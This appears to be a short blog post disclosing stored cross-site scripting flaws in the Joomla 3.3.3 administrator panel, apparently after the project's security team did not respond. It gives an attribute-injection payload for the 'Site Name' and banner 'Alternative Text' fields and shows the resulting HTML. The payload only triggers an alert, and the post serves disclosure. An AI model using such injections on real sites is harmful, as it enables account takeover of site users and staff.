XSS Vulnerabilities on Joomla v3.3.3

Sent a report to the joomla! strike tream but have never received a response.
Seems like the vuln is not critical.
To trigger these xss(es) vuln you will need access to the administrative panel. Since the vuln(s) are basically the same but are in different parameters I’ll be showing an example to just one.
1) Go to the Global Configuration page:
2) Type in the following payload in “Site Name”

" onclick=alert(1) test="

3) Save
4)  On the admin page, if you click on the site logo or the site name, or on your main public page when you click on the site name, javascript will be executed.

<header class="header">
		<div class="container-logo">
			<img src="/joomla/administrator/templates/isis/images/logo.png" class="logo" alt="" onclick="alert(1)" test="">
	<span class="site-title" title="" onclick="alert(1)" test="">" onclick=alert(1) test="</span> 
<a class="brand pull-left" href="/joomla">
						<span class="site-title" title="" onclick="alert(1)" test="">" onclick=alert(1) test="</span>											</a>
					<div class="header-search pull-right">

There are many other parameters in the admin panel that is vulnerable. Another example would be the “Banner” page. Entering the exact same payload as the one above in “Alternative Text” input box will also trigger js when the banner is clicked. Web admins that allow staffs to edit banners should be aware of this vuln as this could lead to an account takeover or something more serious.
Screen Shot 2557-07-02 at 11.07.31 PM
Screen Shot 2557-07-02 at 11.10.09 PM

Screen Shot 2557-07-14 at 4.17.37 PM

Leave a Reply